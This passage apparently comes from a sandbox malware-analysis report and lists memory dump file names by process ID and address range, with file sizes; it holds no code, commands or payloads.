                                                                                                                      • memory/4980-198-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5032-210-0x0000000003260000-0x00000000032BC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        368KB

                                                                                                                      • memory/5032-206-0x0000000004709000-0x000000000480A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/5032-202-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5032-157-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5040-367-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5052-351-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5056-341-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-340-0x0000000007D00000-0x0000000007D01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-327-0x0000000006DC0000-0x0000000006DC1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-331-0x0000000004D60000-0x0000000004D61000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-332-0x0000000004D62000-0x0000000004D63000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-324-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5056-335-0x00000000073C0000-0x00000000073C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-355-0x0000000004D63000-0x0000000004D64000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-339-0x0000000007B90000-0x0000000007B91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-343-0x0000000007E70000-0x0000000007E71000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-328-0x0000000007430000-0x0000000007431000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5084-290-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5096-353-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5108-195-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5236-296-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5260-227-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5320-357-0x00000000052D0000-0x00000000058D6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/5320-356-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5412-307-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5460-368-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5460-237-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5512-305-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5624-250-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5624-303-0x00000000048D0000-0x0000000004961000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        580KB

                                                                                                                      • memory/5624-304-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.0MB

                                                                                                                      • memory/5764-360-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5764-338-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5796-272-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5812-348-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5816-365-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5816-363-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5884-352-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5892-315-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5920-362-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5920-278-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5956-361-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6028-281-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6068-369-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6120-282-0x0000000000000000-mapping.dmp